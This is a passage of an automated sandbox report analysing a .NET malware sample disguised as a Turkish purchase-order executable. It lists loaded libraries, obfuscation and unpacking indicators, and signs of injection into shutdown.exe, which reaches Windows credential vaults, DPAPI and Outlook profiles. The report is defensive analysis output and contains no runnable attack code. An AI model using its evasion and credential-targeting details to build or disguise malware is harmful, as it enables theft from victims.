            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\shutdown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: fTTh.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140611303.0000000000EAE000.00000002.00000001.01000000.0000000C.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000002.2563006189.0000000000EAE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2215943559.0000000003797000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2213972420.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: shutdown.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562237583.0000000001458000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 0000000D.00000003.2215943559.0000000003797000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2213972420.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: shutdown.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562237583.0000000001458000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fTTh.pdbSHA256x source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.cs.Net Code: yqN2SwCrWk System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.cs.Net Code: yqN2SwCrWk System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.2dbc398.1.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.2dbc398.1.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.7540000.3.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.7540000.3.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 13.2.shutdown.exe.400cd08.2.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.2.zkhJmzWnNnFLoIoaAsyqpwQZ.exe.2d8cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.0.zkhJmzWnNnFLoIoaAsyqpwQZ.exe.2d8cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: 0xB95FCE0F [Sat Jul 21 02:33:51 2068 UTC]
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_02CD2794 push ds; iretd 0_2_02CD2797
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_02CD0448 pushad ; retf 0_2_02CD06F6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_05361CD4 push ds; retf 0_2_05361CE2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F98D8 push cs; retf 0_2_072F98E2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00418884 push eax; ret 5_2_0041888B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D888 push ecx; ret 5_2_0040D889
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00407894 push eax; iretd 5_2_00407898
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D202 pushad ; ret 5_2_0040D205
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00401A31 push es; retf 5_2_00401A37
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0041435D push CF08DBE8h; retf 5_2_00414385
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004233D3 push edi; iretd 5_2_004233DE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D462 push ebx; iretd 5_2_0040D45A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00408465 pushfd ; iretd 5_2_00408472
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00414C7A push edx; iretd 5_2_00414C91
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D407 push ebx; iretd 5_2_0040D45A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00414C83 push edx; iretd 5_2_00414C91
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00414DD6 push ebx; iretd 5_2_00414DD7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004185F8 push ebp; ret 5_2_004185F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00403590 push eax; ret 5_2_00403592
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00416653 push edx; retf 5_2_004167A1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D686 push ebp; retf 5_2_0040D688
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040174F push ds; iretd 5_2_00401765
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0170225F pushad ; ret 5_2_017027F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017027FA pushad ; ret 5_2_017027F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017309AD push ecx; mov dword ptr [esp], ecx5_2_017309B6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0170283D push eax; iretd 5_2_01702858
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_0318E25D push edi; iretd 12_2_0318E268
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_03178291 push ebx; iretd 12_2_031782E4
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_031732EF pushfd ; iretd 12_2_031732FC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_031782EC push ebx; iretd 12_2_031782E4
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_0318A184 push ds; iretd 12_2_0318A194
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: section name: .text entropy: 7.978509985045748
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, wNIeg05p2J7LI0sxAR.csHigh entropy of concatenated method names: 'NImRDM0cjf', 'TpyRXtcAxC', 'U9UCyfsU2Y', 'cFsCrg05Ja', 'WkYRHdyqxA', 'VK1R7oyHoy', 'TnsRiBCRj8', 'MprRunGlCo', 'vABRGG4Awa', 'gteRf7AQBg'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, hlp3NEjD1wHnN17DLi.csHigh entropy of concatenated method names: 'wIfCBKOMC0', 'DbOCT3JGFl', 'M1ACYxOm3s', 'iEVCmZ3mDg', 'OjTCuoyvxr', 'wjRC9C74ho', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, Avoj1xuZSJJPO5cL1n.csHigh entropy of concatenated method names: 'mSgaJCtutB', 'E1ma7q9C06', 'tGDaubWDjp', 'mBmaG79fZ5', 'Cd7aTQkUjY', 'bCLaY33FCU', 'THkamxRFp0', 'hP0a9vnUAQ', 'gg9aweanRF', 'bjNatNwR5B'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, CrKSSdWwC4ohnA1aue.csHigh entropy of concatenated method names: 'FbcRLh9JgW', 'jAcRhTGmdL', 'ToString', 'NgLRv9Nkw7', 'lO9RxlUuY0', 'GBMRFs2DJG', 'KE6RoDYiNq', 'EWVRpU1TA9', 'q9NRAXobQ3', 'rCYR3ItP2u'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, P5EYD3VTbd1RAsAUnc.csHigh entropy of concatenated method names: 'lIQxuGqBEd', 'lNDxG4akiX', 'xn5xfXSDWn', 'mTDxW1A7F3', 'i0MxOJ0R0H', 'Ehvx5QMOxZ', 'zgWxMVXbHG', 'M5axDxXSAO', 'Pt2xjtUxmm', 'R6exXPw9uo'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, qHo7EMPthDctL8gHN0.csHigh entropy of concatenated method names: 'EajAcq0svO', 'bM9AKy4rSt', 'tAvASO0B7o', 'QsKA0dtng0', 'DfMAkRxMDn', 'jDgA17kEOA', 'xg9An6Eecn', 'hkvAVKo0ix', 'NbcAQ1kv6D', 'MIGAsXO45h'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, C4bZLLrNrbZofIeJmqZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'M4mluCB7tx', 'pmClGW8veQ', 'JRFlfUXl8p', 'vgnlWvLPBr', 'Q9glO2DBFn', 'de5l55Dt4Y', 'eT8lM47SDF'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, hKuFhjryaSVDxkDxM28.csHigh entropy of concatenated method names: 'LBfEcUNRag', 'jMiEKlDBRT', 'swcES0hw9u', 'wysE0uIYat', 'vCQEk7rGdX', 'rBeE1LsXM1', 'osTEn4GX1U', 'IyxEVHWqBo', 'WehEQn8egO', 'LnBEsHihx6'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, oDcZLoiMDjhxP6TWfD.csHigh entropy of concatenated method names: 'yVw4Vna94c', 'PVF4QoR7Tu', 'hWn4BgyStB', 'oZX4TnfV5q', 'whp4mFUbNK', 'lR249NSKy6', 'ITs4teOODJ', 'VMg46r7Skx', 'dHW4JBj2m2', 'umb4Hao2Ha'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, SPjLDHDQd8ndbtcfNw.csHigh entropy of concatenated method names: 'NYOCvhndW7', 'hpBCxC4spn', 'XgICFHUOhg', 'z8LCoOkimi', 'rmZCprJP8U', 'MKECAwMWul', 'e3uC3xtEUn', 'ceyCgeqwR8', 'cvOCLKn0mF', 'h2KChdl6ZO'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, FxTBy2f31BZEcJBBZx.csHigh entropy of concatenated method names: 'ToString', 'aJdbH1vyeo', 't4gbTmS45i', 'mELbYoVfjs', 'fJkbmjXknP', 'FcBb9XxU9w', 'wK3bw5CDbI', 'DSKbt6qKVw', 'O9Hb6WAoEg', 'fwFbPODYZe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, Cv8vxsTJ4YVbIBS0cF.csHigh entropy of concatenated method names: 'G3kF0E303P3ObbByeTh', 'V2mI0K3VGSFTA5wFxkA', 'bd8Uor3FAOSvJmju4Ym', 'HrFpCtyo6e', 'e5BpEoJdR5', 'XEKplVYVQJ', 'b22NTc3TDBM9ao9Zv6a', 'bp9DpI3sfSQ1HZJbi68', 'KUANZk3EpWQm3p8UuQA'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, QLUuWKz8Wdj3Ib1tdJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LPYE4aX3fJ', 'fv2EaxPxpW', 'WYfEbaQsqS', 'DExERX2WPl', 'FMHECfGgGa', 'hq4EEWjRnq', 'O1cEl0qjc9'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, lHBIC5x361wOap6SkM.csHigh entropy of concatenated method names: 'Dispose', 'X0arjahDUi', 'MAaeTds3j2', 'NlHqqhjSKI', 'OfPrXjLDHQ', 'v8nrzdbtcf', 'ProcessDialogKey', 'cwFeylp3NE', 'W1werHnN17', 'XLieeSVmAt'
